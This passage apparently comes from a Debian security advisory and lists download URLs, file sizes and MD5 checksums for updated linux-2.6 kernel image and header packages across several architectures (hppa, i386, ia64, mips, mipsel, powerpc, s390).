c17d933ab1a987137164b17cc824cc01 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 10562712 eab6c4fb035514db0a3d2013a58e8811 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 11812822 3739d1c70edc836b2b6183c91c64b891 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 57582 0227efab68fe6eba71e9a24707c14a3e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 202348 85844928a7e53875ed65cd8ca9e2564d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 3026082 a6e5f10396429271a3f6af6db3bd2fcd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 11813274 39a6c61b5750bfbd3af21e20efe10790 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 11003404 2c476e17aadea4d5fe9787fc31bbf270 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 10562896 62a8eeed396f7b0939bc8afcd3fa1b5f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 202170 c0a87e0bb013b276498bf22784c45cf2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 57610 b94850d5975ec590c4bfd47b7fa92ffa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 201544 2e8116afb9b090f0e8328ecdf8b721c8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 57656 b4936ba6ac6d07ea688bc309f1a9ecf9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 201206 865306b58d1bb6a51125120b86f623a6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 11403058 7675c1356f94a0b7a9d3ee73a11ac0fc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 201116 abba23bc60ba910f881b77e03e253993 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-24etch1_hppa.deb Size/MD5 checksum: 11403572 8a70c6799aee1cf84d69db41128b5aa4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_hppa.deb Size/MD5 checksum: 57632 e4c7d6b4040947e3ebfab64731e65d7c i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 57550 d1ceaf85ffbab26f6263c1d2a1084628 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 281720 fdfbc017794ba163718541a1c9bcee33 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 3153370 1f3fbdaff2406c79f078121430552b95 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 276026 a72a6f8b4b34ebe811011c05844aa9a3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 3172814 0b15c3215f8c11bb74721ae95d3bbbee http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 14297004 a2c3b3f3bf7fdd96a0956559baf4a575 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 3058734 97ed58c50160f2bc1489183c64faa83f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 57608 9390abb9a6730f776b0eef14db8d1d15 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 14296618 30e96680a42f3388f547674d83a211b5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 273904 4546e871056555434d1fb068d46dcc34 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 283582 f7c8322aa914f0d2e1011e8ad90eb511 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 277092 041c0f265fac7dbb870ab13705850cec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 286424 ea3ab3f5a6d5cebb0839c50d300fbbf6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 16839428 f55d4b7e3ad16b770e4f872d6002938c http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch2_i386.deb Size/MD5 checksum: 5510668 f6318da68f755fb149d3e4b7345a5454 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 283488 034e2db0c65bdf8356de66933dbe18dc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 57554 3c4263a6bb304f46306985eec6da76e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 16342612 16a822f4a4cc910bf4ef2ca154d80db6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 282614 69948ea58a5f3e023bd2f7e9334f5206 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 283292 a609e8c75751bd23f93ea8c9c9805862 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 275714 7d20932e6e8a9defb771762dec8c2cf8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 3175260 cdd0199e4a2deb3384babde08fff29ed http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 281854 2b8b7cb1cf824259ef5bca51dd7e6e9e http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 57554 25d25e9c76e48d90abdc6dc4fa98dc36 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 275626 c69d4bb7338689bc1c1034c72a73552a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 16839160 3abb3b88db3261585f1107b816d7e73b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 16478602 406b982ea69b3fbf60f05bc79aeb01c3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 16414150 8980f62d059c08ee4715b4f840251c4a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 285546 20fddef08d809bd62618dba1170b2443 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 16516304 98127faa1288680196802d80a2e516b0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 283196 39cf1e20d4fa1be5dc81639f80cc53da http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 16342464 492956ec0bfb3a9348de483af93358e0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 16413914 16e9f9a184d734ff9ba72cf448d9e006 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 16195640 ac590b14fea2c14933773e7acd8ee2e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 16384758 275b6551ea309a85247c8269a2ca131f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 1303760 6c21475aca4f6840bfd6ecf72ca07ddf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 16195636 512976a3d50729b684e101f3d436d0f1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 57498 3ad4d448a82a79bee90d020a1a3efd4c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 283614 9958a5555871c3b55395a3811e2ba16a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 3175062 760a09051d4c6f159d94ab61ce46d3e2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 283278 d181a3c6b7e2b45338452652e9788f81 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 3153590 d06c74e964ddb8e06e57149237cb0e13 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.24etch2_i386.deb Size/MD5 checksum: 25602218 a43ee679786a92ff8600c6a8e7fb036c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 14284348 654f88dc30ab167b523c06c860268d2b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 16516566 db353533d7e7d533225e99bd8fd6ddf1 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 57482 a6ab58ab8b3cfa2dce6f49521b7a1f5b http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 57538 1eac10fb9251c8242e06bc9b15cbc8a6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 16385264 488399c28192c835a772e1e6763254ba http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 14284744 138457c64958da10328a9bc662518f47 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 1331760 e977207f31a617418114c629310a0a64 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 3173012 9abba6a99f0c83bf508b490883ebd27c http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 57490 d98a55e25eebbf20315792e2da604cbd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 16478822 86cd8edc1f2224fb9186b07cc63c0f30 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 3058924 6df6c7ce3239c160c836b30b0cb850a4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 1303686 6b4cb561ccf0ae8b692505a83a62c1c3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-24etch1_i386.deb Size/MD5 checksum: 273704 a48288dec2bbd3e4eaf297891a82e2ac http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 282232 15d0b97ca171af915931e43445323401 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-24etch2_i386.deb Size/MD5 checksum: 1331834 911ed2ea38e95a8459ce6eb00461c67a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_ia64.deb Size/MD5 checksum: 3086288 8159d8247b8439aad32be09747c44ed3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-24etch1_ia64.deb Size/MD5 checksum: 259050 c4dabe17057799266a806ee9f49c1d01 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-24etch1_ia64.deb Size/MD5 checksum: 259026 fe551aa81737ae7562ea613074687159 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-24etch2_ia64.deb Size/MD5 checksum: 259020 da3cf312b5d0ce8bc59ab152134c7e10 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-24etch2_ia64.deb Size/MD5 checksum: 57576 beedcbe1cbf4c9ff2eead5e7dd5bbeaa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-24etch1_ia64.deb Size/MD5 checksum: 28191326 75be5f2b0b5d9dde291d7fc3f75a3c01 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_ia64.deb Size/MD5 checksum: 57558 f29ab34edb09fbf0cf460a52d900cb86 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-24etch2_ia64.deb Size/MD5 checksum: 28189032 5b2684d4dafbcc34e077e76367f99d7d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-24etch1_ia64.deb Size/MD5 checksum: 57518 53097da6759f5dbf720ed6741d5dfc31 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-24etch2_ia64.deb Size/MD5 checksum: 259028 dcecde4739f9e7091b498c55d543de61 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_ia64.deb Size/MD5 checksum: 3086420 1715deb979b2fd128a404017c51199ad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-24etch1_ia64.deb Size/MD5 checksum: 28022512 2f7150f069fe10314be8366b6f33c80a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-24etch2_ia64.deb Size/MD5 checksum: 28021554 15888059ada25a1df53ea1e06f98cc43 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_ia64.deb Size/MD5 checksum: 57498 ff2147d4b9d86a7104049004a75d0b0b mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 57556 c55b8f2b6c058ac2e8e977a244a8ca0e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 9057908 930211393dd0eae186413bf64d1ad929 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 166366 b8ed836c7b52a7473b5442cf34571932 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 8290842 c1e26a281edabea12127297eb6908cce http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 186218 998e71301c0e570eaea5f89d4c14bc94 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 186040 f55f16820c5ee432380103be8d3b98a4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 162948 6aa24c824d9bdc46a9b2e3ec9206ca56 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 3353852 dd5151c5ba373421c1d73414f7635050 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 6099320 91a09240e52a5e253432b48f18340018 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 15630942 226ef41a01e8321d063b11ef3cdd71ac http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 153842 3f0980845300200bb42ebc17e50da882 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 57602 e3259b68bbd8f112ac288d964b67735f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-24etch2_mips.deb Size/MD5 checksum: 15661864 50e4498ba1db7b799a4a943964d7dba4 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 15071130 7b47b1248592c27110f95d8433df14ba http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 57612 36149a3f699bd3a27812379659d63797 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 181876 f88c97af7dc565fadf445df63cf63092 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 15046026 d91a6917a024bb53f1409038b7a5da7d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 5950792 bdc92871276e840c831b6608d7580b35 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 159122 f289f1bdd1042dfd137c28ebdbb4fdc0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 186138 de5ba3faa0cf39eb70d1a901382af660 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 153884 56ab7e619af304890feb104ae0031ae0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 57558 e5579bb41376ef237efd5b1d1beeec8e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 3354246 e271a853595718667ad9ee92b640a945 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 9864850 38643aac81245db2bd4e3ad2e8187d43 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 5930606 bc44903ec933088611bbab35eae7d0a6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 185890 8a76b425da8f9bd843445ab402e9c369 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 6037172 6e7d261fbebb9cb6b3d7420f030d57e0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-24etch2_mipsel.deb Size/MD5 checksum: 159120 49606ba4ec3b9dc3891a8db70dd32248 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 255646 cb3a8874c18a6e4e91181880a6c9b85c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 16410114 ba833fa8dd87cfc4b4b8f6c69a4c45ab http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 249724 e83692d6b13eaf23e53d9ca8bcb619dd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 3419496 627c21fbdb9350be0b4cbc808d696f59 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 257626 459bc8e3abd033aa341780557a5e5467 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 233010 391c104f5ffc427f003f55366ccb26ca http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 16975346 a1cf3eb6652bf9cf5d921aee20eb7679 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 257372 19c2286c4d82b40ee3d1eab8b47a1a70 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 18365660 d3a96656b0d4e60217fa4e32bf613efb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 18316678 855d8c6664fcd4f0fc485a2254b434fa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 3396976 ae6f8c9d11c5cefbd55a79a0065b95e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 16634246 82837cc8be152a2eaad04864534b1354 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 256610 fafe406336be7d5a72c95f5ed4434486 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 17016040 aab904f4de994ac02f6767d787aaa2d7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 57556 a0961152b7c461bcf46838598f337fa2 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.24etch2_powerpc.deb Size/MD5 checksum: 3371096 4ed778de0fe58e4e575f2009b1b21a68 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 15164166 48f27600af451a81ed8f439ead2d9094 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 57506 309dcf0bb0093626145bb5a3dbbcd313 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-24etch1_powerpc.deb Size/MD5 checksum: 256318 dd09e9ab9b0b55e6242fd43d39ca52b0 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 1444792 65cf6d54d1864fa9593cc1d7bd48e32c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-24etch1_s390.deb Size/MD5 checksum: 5670236 9ffbaf35ad540ef7943246cff5f56d9e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 57550 c31a56e819cdca9d8f683756e86d6e3b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-24etch2_s390.deb Size/MD5 checksum: 5408924 23205928ae2570fa9de9d918a92bbffe 